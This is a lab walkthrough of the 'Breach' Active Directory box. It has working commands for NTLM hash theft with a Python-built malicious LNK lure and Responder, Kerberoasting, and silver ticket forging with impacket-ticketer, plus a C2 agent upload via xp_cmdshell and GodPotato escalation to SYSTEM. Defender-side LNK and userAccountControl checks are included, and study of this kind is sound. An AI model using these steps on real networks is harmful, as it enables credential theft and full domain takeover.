Breach
Initial machine information
The User flag for this Box is located in a non-standard directory, C:\share\transfer\.
Overview
Breach is an Active Directory machine that chains NTLM hash theft via a malicious LNK file dropped on a writable SMB share, Kerberoasting of a service account (svc_mssql) that turns out to be trusted for unconstrained delegation, a silver ticket forged with that account's key to reach MSSQL as Administrator, and a GodPotato escalation from the SQL service's SeImpersonatePrivilege to SYSTEM. The unconstrained delegation on svc_mssql also opens an alternative route: coercing DC authentication to a host we control with PetitPotam + KrbRelayX, capturing the DC$ TGT and performing DCSync to obtain the Administrator hash. This writeup takes the silver ticket path instead.
Recon
Nmap
```bash
sudo nmap -sC -sV -vv -oA tcp 10.129.41.140 && sudo nmap -sC -sV -vv -p- -oA allports 10.129.41.140
```
Standard Windows ports. Port 80 has no useful content. SMB (445) allows guest access and has a writable share - the primary initial attack surface.
SMB - Writable Share
Enumerate shares as a guest:
Write access is confirmed across all directories in the share. This immediately suggests NTLM theft via planted files: when a user or automated process browses the share, any file that makes Explorer fetch a resource from a UNC path on our host (an LNK icon, a SCF file, a URL file icon) causes its SMB client to authenticate to us with NTLM, and we capture the NetNTLMv2 response for offline cracking.
Foothold
NTLM Theft via Malicious LNK
Generate a malicious LNK file whose icon location is a UNC path on our host. Explorer resolves that path while rendering the folder listing, so the viewer's SMB client authenticates to our Responder listener as soon as someone browses the share, without the file ever being opened:
```bash
python3 ~/Documents/local-scripts/ntlm_theft/ntlm_theft.py -g lnk -s 10.10.14.98 -f important
```
Start Responder first, then upload the LNK to the writable share (the hash arrives when a user or scheduled process browses the share, so leave the listener running):
```bash
sudo responder -I tun0
```
When the share is browsed, we capture an NTLMv2 hash for JULIA.WONG (abbreviated here). Crack it with hashcat mode 5600 (NetNTLMv2):
```bash
hashcat -a 0 -m 5600 hash /mnt/hgfs/I/data/rockyou.txt
```
```
JULIA.WONG::BREACH:...:Computer1
```
Cracked: Julia.Wong:Computer1
Julia's account grants SMB access but not WinRM or RDP. Her credentials are still valuable for further AD enumeration and attacks.
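The LNK lure that ntlm_theft produces can be built by hand in a few dozen lines, which also makes the trick easy to recognise when sweeping a share. The following is an added example, not ntlm_theft's code and not part of the original writeup: it writes a minimal ShellLink file whose only payload is an ICON_LOCATION string pointing at a UNC path, plus a small parser that pulls the StringData fields back out so you can check LNKs found on a share for icons that resolve off-host. The listener address 10.10.14.98 and the share/file names are assumptions for illustration.

```python
import struct

# Constants from MS-SHLLINK. Only the fields this lure needs are set; everything else is zero.
LNK_HEADER_SIZE = 0x4C
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-0000-0000-C000-000000000046}
HAS_LINK_TARGET_ID_LIST = 0x01
HAS_LINK_INFO = 0x02
HAS_NAME = 0x04
HAS_RELATIVE_PATH = 0x08
HAS_WORKING_DIR = 0x10
HAS_ARGUMENTS = 0x20
HAS_ICON_LOCATION = 0x40
IS_UNICODE = 0x80
# StringData structures appear in this fixed order, each only if its flag is set.
STRING_DATA_ORDER = (
    (HAS_NAME, "name"),
    (HAS_RELATIVE_PATH, "relative_path"),
    (HAS_WORKING_DIR, "working_dir"),
    (HAS_ARGUMENTS, "arguments"),
    (HAS_ICON_LOCATION, "icon_location"),
)


def build_lnk(icon_path: str) -> bytes:
    """Minimal .lnk: ShellLinkHeader + ICON_LOCATION string + ExtraData terminal block.

    Explorer resolves icon_path when it draws the folder listing, so a UNC path such as
    \\\\attacker\\share\\x.ico makes the viewer's SMB client authenticate to the attacker.
    """
    flags = HAS_ICON_LOCATION | IS_UNICODE
    header = struct.pack(
        "<I16sIIQQQIiIHHII",
        LNK_HEADER_SIZE, LNK_CLSID, flags,
        0,            # FileAttributes
        0, 0, 0,      # CreationTime / AccessTime / WriteTime (FILETIME, unset)
        0,            # FileSize
        0,            # IconIndex
        1,            # ShowCommand = SW_SHOWNORMAL
        0, 0, 0, 0,   # HotKey, Reserved1, Reserved2, Reserved3
    )
    assert len(header) == LNK_HEADER_SIZE
    icon = struct.pack("<H", len(icon_path)) + icon_path.encode("utf-16-le")  # CountCharacters + chars
    terminal_block = b"\x00\x00\x00\x00"  # ExtraData: a TerminalBlock (size < 4) ends the file
    return header + icon + terminal_block


def parse_string_data(data: bytes) -> dict:
    """Walk a ShellLink file and return its StringData fields (works on real LNKs too)."""
    size, clsid, flags = struct.unpack_from("<I16sI", data, 0)
    if size != LNK_HEADER_SIZE or clsid != LNK_CLSID:
        raise ValueError("not a ShellLink file")
    off = LNK_HEADER_SIZE
    if flags & HAS_LINK_TARGET_ID_LIST:          # IDListSize (u16) followed by the IDList
        off += 2 + struct.unpack_from("<H", data, off)[0]
    if flags & HAS_LINK_INFO:                    # LinkInfoSize (u32) includes itself
        off += struct.unpack_from("<I", data, off)[0]
    unicode = bool(flags & IS_UNICODE)
    fields = {}
    for bit, name in STRING_DATA_ORDER:
        if not flags & bit:
            continue
        count = struct.unpack_from("<H", data, off)[0]
        off += 2
        nbytes = count * 2 if unicode else count
        fields[name] = data[off:off + nbytes].decode("utf-16-le" if unicode else "cp1252")
        off += nbytes
    return fields


def is_unc_icon_lure(data: bytes) -> bool:
    """True when the LNK's icon would be fetched from a remote host (the NTLM-theft pattern)."""
    icon = parse_string_data(data).get("icon_location", "")
    return icon.startswith("\\\\")


if __name__ == "__main__":
    # Assumed listener address; the UNC only has to point at our host, the .ico need not exist.
    lure = build_lnk(r"\\10.10.14.98\share\important.ico")
    with open("important.lnk", "wb") as fh:
        fh.write(lure)
    print(parse_string_data(lure), is_unc_icon_lure(lure))
```

The same parser run over every .lnk on a share, keeping those where is_unc_icon_lure is true, is the defender-side check for this technique.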
Kerberoasting - svc_mssql
Julia's credentials allow authentication to the domain. Enumerate SPNs for Kerberoastable accounts:
svc_mssql has a registered SPN and is Kerberoastable:
Request the TGS hash for offline cracking:
```bash
impacket-GetUserSPNs breach.vl/julia.wong:Computer1 -request
```
Crack with hashcat (mode 13100 = Kerberos 5 TGS-REP etype 23, i.e. RC4-HMAC; if the ticket had come back as etype 17/18 AES the modes would be 19600/19700 and cracking would be far slower):
```bash
hashcat -a 0 -m 13100 svc_mssql_hash /mnt/hgfs/I/data/rockyou.txt
```
Cracked: svc_mssql:Trustno1
Unconstrained Delegation
svc_mssql is trusted for delegation - specifically unconstrained delegation:
Unconstrained delegation (TRUSTED_FOR_DELEGATION in userAccountControl) means that when a user with a forwardable TGT authenticates to an SPN owned by svc_mssql, the client includes a forwarded copy of its TGT in the AP-REQ. That TGT sits inside the authenticator, which is encrypted with the session key carried in the service ticket, and the service ticket is encrypted with svc_mssql's long-term key, which we now hold. So anything that answers for an svc_mssql SPN and has that key can decrypt the exchange and keep the caller's TGT; this is what KrbRelayX does. Coercing a high-value principal such as the DC machine account (PetitPotam) to authenticate against such a name would hand us the DC$ TGT and with it DCSync. The caveat is that the coerced host has to be pointed at a hostname that both carries an svc_mssql SPN and resolves to our listener, which is extra setup; the rest of this writeup instead uses svc_mssql's key directly to forge a silver ticket for MSSQL.
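Spotting this from raw LDAP output comes down to decoding userAccountControl. The following added example (written for this page, not a tool used in the writeup) takes a constructed sample of account records of the kind GetUserSPNs or ldapsearch return and flags the two things that matter here: accounts that are Kerberoastable, and accounts with unconstrained delegation other than the domain controllers, which always have it. The sample's flag values, the BREACHDC$ name and the svc_mssql SPN are assumptions for illustration, not the box's real directory.

```python
# userAccountControl bits (MS-SAMR / MS-ADTS) relevant to Kerberos abuse triage
ACCOUNTDISABLE = 0x0002
NORMAL_ACCOUNT = 0x0200
WORKSTATION_TRUST_ACCOUNT = 0x1000
SERVER_TRUST_ACCOUNT = 0x2000               # domain controllers
DONT_EXPIRE_PASSWORD = 0x10000
TRUSTED_FOR_DELEGATION = 0x80000            # unconstrained delegation
NOT_DELEGATED = 0x100000                    # "account is sensitive and cannot be delegated"
DONT_REQ_PREAUTH = 0x400000                 # AS-REP roastable
TRUSTED_TO_AUTH_FOR_DELEGATION = 0x1000000  # constrained delegation with protocol transition

UAC_NAMES = {
    ACCOUNTDISABLE: "ACCOUNTDISABLE",
    NORMAL_ACCOUNT: "NORMAL_ACCOUNT",
    WORKSTATION_TRUST_ACCOUNT: "WORKSTATION_TRUST_ACCOUNT",
    SERVER_TRUST_ACCOUNT: "SERVER_TRUST_ACCOUNT",
    DONT_EXPIRE_PASSWORD: "DONT_EXPIRE_PASSWORD",
    TRUSTED_FOR_DELEGATION: "TRUSTED_FOR_DELEGATION",
    NOT_DELEGATED: "NOT_DELEGATED",
    DONT_REQ_PREAUTH: "DONT_REQ_PREAUTH",
    TRUSTED_TO_AUTH_FOR_DELEGATION: "TRUSTED_TO_AUTH_FOR_DELEGATION",
}

# Constructed sample records (illustrative values, not the box's real directory).
SAMPLE_ACCOUNTS = [
    {"sAMAccountName": "julia.wong", "userAccountControl": NORMAL_ACCOUNT,
     "servicePrincipalName": []},
    {"sAMAccountName": "svc_mssql",
     "userAccountControl": NORMAL_ACCOUNT | DONT_EXPIRE_PASSWORD | TRUSTED_FOR_DELEGATION,
     "servicePrincipalName": ["MSSQLSvc/breachdc.breach.vl"]},
    {"sAMAccountName": "krbtgt", "userAccountControl": NORMAL_ACCOUNT | ACCOUNTDISABLE,
     "servicePrincipalName": ["kadmin/changepw"]},
    {"sAMAccountName": "BREACHDC$",  # assumed DC account name
     "userAccountControl": SERVER_TRUST_ACCOUNT | TRUSTED_FOR_DELEGATION,
     "servicePrincipalName": ["ldap/breachdc.breach.vl", "HOST/breachdc.breach.vl"]},
]


def decode_uac(value):
    """Names of the set bits, e.g. 0x90200 -> NORMAL_ACCOUNT, DONT_EXPIRE_PASSWORD, TRUSTED_FOR_DELEGATION."""
    return [name for bit, name in UAC_NAMES.items() if value & bit]


def is_machine_account(acct):
    return bool(acct["userAccountControl"] & (WORKSTATION_TRUST_ACCOUNT | SERVER_TRUST_ACCOUNT))


def kerberoastable(accounts):
    """Enabled user accounts with an SPN: a TGS can be requested for them and cracked offline.
    Machine accounts (random 120-char passwords) and krbtgt are skipped."""
    out = []
    for a in accounts:
        uac = a["userAccountControl"]
        if not a["servicePrincipalName"] or uac & ACCOUNTDISABLE:
            continue
        if is_machine_account(a) or a["sAMAccountName"].lower() == "krbtgt":
            continue
        out.append(a)
    return out


def unconstrained_delegation(accounts, include_dcs=False):
    """Accounts with TRUSTED_FOR_DELEGATION. DCs always have it; the finding is any other account."""
    out = []
    for a in accounts:
        uac = a["userAccountControl"]
        if not uac & TRUSTED_FOR_DELEGATION:
            continue
        if not include_dcs and uac & SERVER_TRUST_ACCOUNT:
            continue
        out.append(a)
    return out


def asrep_roastable(accounts):
    """Enabled accounts that do not require Kerberos pre-authentication."""
    return [a for a in accounts
            if a["userAccountControl"] & DONT_REQ_PREAUTH and not a["userAccountControl"] & ACCOUNTDISABLE]


def triage(accounts):
    names = lambda recs: [r["sAMAccountName"] for r in recs]
    return {
        "kerberoastable": names(kerberoastable(accounts)),
        "unconstrained_delegation": names(unconstrained_delegation(accounts)),
        "asrep_roastable": names(asrep_roastable(accounts)),
    }


if __name__ == "__main__":
    for acct in SAMPLE_ACCOUNTS:
        print(f'{acct["sAMAccountName"]:12} {acct["userAccountControl"]:#x} {decode_uac(acct["userAccountControl"])}')
    print(triage(SAMPLE_ACCOUNTS))
```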
Silver Ticket - MSSQL Access
Retrieve the domain SID:
Generate a silver ticket for MSSQLSvc, impersonating Administrator:
```bash
impacket-ticketer -nthash 69596C7AA1E8DAEE17F8E78870E25A5C \
  -domain breach.vl \
  -domain-sid S-1-5-21-2330692793-3312915120-706255856 \
  -spn MSSQLSvc/breachdc.breach.vl Administrator
```
The -nthash value is svc_mssql's NT hash, i.e. the RC4 key for the cracked password Trustno1; the ticket and its PAC are encrypted with it, so the MSSQL service accepts the Administrator identity without the KDC ever being involved. Export the resulting Administrator.ccache via KRB5CCNAME and use the ticket to connect to MSSQL as Administrator, then upload an AdaptixC2 agent via xp_cmdshell:
Beacon established:
Privilege Escalation
SeImpersonatePrivilege → GodPotato
The MSSQL service account has SeImpersonatePrivilege:
SeImpersonatePrivilege lets a process impersonate the token of any client that authenticates to it. Potato-family tools exploit that by tricking a SYSTEM-owned component into authenticating to a listener they control. GodPotato abuses the DCOM/RPCSS OXID resolver so that the SYSTEM RPC server connects back to a named pipe the tool owns, then impersonates the resulting token to spawn a SYSTEM process; unlike JuicyPotato or RoguePotato it needs neither a specific CLSID nor an external redirector.
Use GodPotato to escalate to SYSTEM:
https://github.com/BeichenDream/GodPotato
A new beacon fires as SYSTEM:
Attack Chain Summary
| Phase | Technique | Result |
|---|---|---|
| Recon | SMB guest - writable share | Upload path confirmed |
| NTLM theft | Malicious LNK + Responder | Julia.Wong:Computer1 |
| Kerberoasting | svc_mssql SPN hash | svc_mssql:Trustno1 |
| MSSQL access | Silver ticket as Administrator | Shell via xp_cmdshell |
| Privesc | SeImpersonatePrivilege + GodPotato | SYSTEM beacon |

